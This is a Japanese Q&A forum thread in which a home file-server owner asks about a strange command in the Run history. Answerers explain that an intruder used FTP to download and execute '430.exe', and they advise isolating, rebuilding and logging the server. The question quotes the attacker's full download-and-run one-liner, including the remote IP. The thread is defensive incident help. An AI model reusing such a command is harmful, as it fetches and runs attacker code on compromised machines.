ウォッチ
家族で共有している、ファイルサーバーのようなものが我が家にはあります。
住んでいるところが違うため、ダイナミックDNSで、ネットに公開しているのですが、最近「ファイル名を指定して実行」からプログラムを実行しようとした時に、うちの家族では理解できない実行履歴が残っていました。
「cmd.exe /c del i&echo open 218.219.21.173 20002 > i&echo user 1 1 >> i &echo get 430.exe >> i &echo quit >> i &ftp -n -s:i &430.exe&del i&exit」
上記コマンドですが、たぶん、接続したかどうかログに書き込んだり、FTPコマンドを自分のローカルのファイルから実行しているのかと思われます。
何分、素人なのでよくわかりません、この解釈であっていますでしょうか?
ちなみにこのサーバは現在、ネットから切り離しています。
あと、OSはXP HE ですが、ログインした人間をログなどから発見することはできるのでしょうか。
よろしくお願いします。
A 回答 (4件)
- 最新から表示
- 回答順に表示
No.4
- 回答日時:
>そうですか、それではリカバリーして固定IPを変更することにします。
>ほんとにありがとうございました。
ちょっと甘い気がします。
リカバリではなく構築し直した方がいいと思いますよ。
自分に被害がなくとも、サーバを踏み台にされたらあなたが加害者になります。
なぜ侵入されたか考え、セキュリティホールを塞いだ方がベターでしょう。
それがサーバを公開する人の義務です。
-
-
- 0
- 件
-
No.3
- 回答日時:
> 詳しくありがとうございます。
そうですか~ DDNSなんでHOST名を変えて登録しなおせば大丈夫な気もすると思うのですが。甘いですね。
ホスト名が変えられてもIPアドレスが判ればアクセス可能ですし、実行された"430.exe"には、定期的にIPアドレスを「親機」に通知する機能を持っていると考えておくべきでしょう。
それに、昨今のクラッカーは外部からアクセスできるPCを自動的に巡回して、潜り込める環境を探していると聞きます。
現在公開しているPCの設定をきちんと組み直さない限り、また同じことが繰り返されると考えてください。
-
-
- 0
- 件
-
No.2
- 回答日時:
http://www.wireshark.org/
標準では、無制限で接続ログを取れます。
ものの本によると、侵入に成功した後、いろいろな仕掛けを作れば、直接くる場合もあるそうです。
http://www.f-secure.com/blacklight/
ルートキットスキャナー
ただ、いろいろとされているならば、あなたのセキュリティに欠陥があるということです。
侵入者にとっては、接続ログを見ない人は大好きだそうです。
標準では、無制限で接続ログを取れます。
ものの本によると、侵入に成功した後、いろいろな仕掛けを作れば、直接くる場合もあるそうです。
http://www.f-secure.com/blacklight/
ルートキットスキャナー
ただ、いろいろとされているならば、あなたのセキュリティに欠陥があるということです。
侵入者にとっては、接続ログを見ない人は大好きだそうです。
-
-
- 0
- 件
-
No.1
- 回答日時:
完全に侵入されていますねぇ……
> この解釈であっていますでしょうか?
1/3 ほど正解です。
以下の操作が行われています。
(1) ftpで "430.exe" というファイルをサーバからダウンロード
サーバも誰かのPCに侵入して作られたものっぽいですね。
(2) 430.exe をPC上で実行
430.exe というのがどのようなプログラムなのかは判りませんが、バックドアだったりircのサーバだったり、どちらにしてもろくなものではないと思います。
> ログインした人間をログなどから発見することはできるのでしょうか。
不可能ではありませんが、痕跡を辿っていく作業が必要になりますのでかなり根気&知識が必要な作業になると思います。また、ISPに情報を提供してもらう場合も必要になってきますので、個人で最後まで実施するのはきわめて難しいかと思います。
警察に相談するのが良いのではないでしょうか。ただ、実害がないと警察もなかなか動いてくれないみたいですが。(この辺は詳しくないので他の人にも聞いてみてください)
警察に相談する場合、現在のPCは指示があるまでそのままにしておくことが望ましいです。内部に残されたプログラムなどが手がかりになるかもしれません。
また、現在のPCを、そのまま再度ネットに繋ぐのはやめましょう。侵入者に「もう一度入って」というようなものです。
公開方法も再検討した方がよいですね。
-
-
- 0
- 件
-
この回答へのお礼
お礼日時:2007/05/04 23:16
詳しくありがとうございます。そうですか~ DDNSなんでHOST名を変えて登録しなおせば大丈夫な気もすると思うのですが。
いかがでしょうか?
お探しのQ&Aが見つからない時は、教えて!gooで質問しましょう!
関連するカテゴリからQ&Aを探す
おすすめ情報
- ・漫画をレンタルでお得に読める!
- ・人生のプチ美学を教えてください!!
- ・10秒目をつむったら…
- ・あなたの習慣について教えてください!!
- ・牛、豚、鶏、どれか一つ食べられなくなるとしたら?
- ・【大喜利】【投稿~9/18】 おとぎ話『桃太郎』の知られざるエピソード
- ・街中で見かけて「グッときた人」の思い出
- ・「一気に最後まで読んだ」本、教えて下さい!
- ・幼稚園時代「何組」でしたか?
- ・激凹みから立ち直る方法
- ・1つだけ過去を変えられるとしたら?
- ・【あるあるbot連動企画】あるあるbotに投稿したけど採用されなかったあるある募集
- ・【あるあるbot連動企画】フォロワー20万人のアカウントであなたのあるあるを披露してみませんか?
- ・映画のエンドロール観る派?観ない派?
- ・海外旅行から帰ってきたら、まず何を食べる?
- ・誕生日にもらった意外なもの
- ・天使と悪魔選手権
- ・ちょっと先の未来クイズ第2問
- ・【大喜利】【投稿~9/7】 ロボットの住む世界で流行ってる罰ゲームとは?
- ・推しミネラルウォーターはありますか?
- ・都道府県穴埋めゲーム
- ・この人頭いいなと思ったエピソード
- ・準・究極の選択
デイリーランキングこのカテゴリの人気デイリーQ&Aランキング
-
excel vbaから実行するexe実行...
-
Visual Studio 「AnyCpu」について
-
Windows PowerShellでC言語を実...
-
実行ファイル(.exe)が別のPC...
-
VBで「ファイル名を指定して実...
-
エスケープ・シーケンスによる...
-
アウトルックが起動しているか...
-
意味不明の実行時エラーで困っ...
-
Windows上のプログラム。「予め...
-
ManagementClassが見つからない。
-
Designer.vbは直接コードをいじ...
-
PHPでPDFの自動印刷
-
VBによる複数バージョンのEXCEL...
-
vba 時間の引き算 例えば 15:00...
-
印刷方向縦横変更の設定の仕方...
-
印刷ダイアログを表示させたくない
-
印刷ダイアログを表示させない方法
-
VB6で作成したアプリを配布する...
-
Process.Startで起動したアプリ...
-
64bitで作ったEXEを32bitで起動...
マンスリーランキングこのカテゴリの人気マンスリーQ&Aランキング
-
「読み込み違反」が起きたとき...
-
Visual Studio 「AnyCpu」について
-
excel vbaから実行するexe実行...
-
Windows PowerShellでC言語を実...
-
C++初心者です。 debug asserti...
-
C#VB、exeに埋め込んだexeの実行
-
実行ファイル(.exe)が別のPC...
-
ACCESSランタイムでエラー
-
VB6.0 exe作成時に実行時エラー...
-
一通ずつ処理したい(アウトル...
-
外部exe呼び出しの方法 ShellEx...
-
Format 関数のバグ?
-
Eclipse CDT MinGWによるC言語
-
JP1/File Transmission Server/...
-
VBで「ファイル名を指定して実...
-
VB.NetのWinsockについて
-
VBにてDLLをデバックする方法。
-
VB2005 Vistaで印刷ができません
-
androidで.exeを実行できますか?
-
ActiveX → VB を起動するとCre...
おすすめ情報
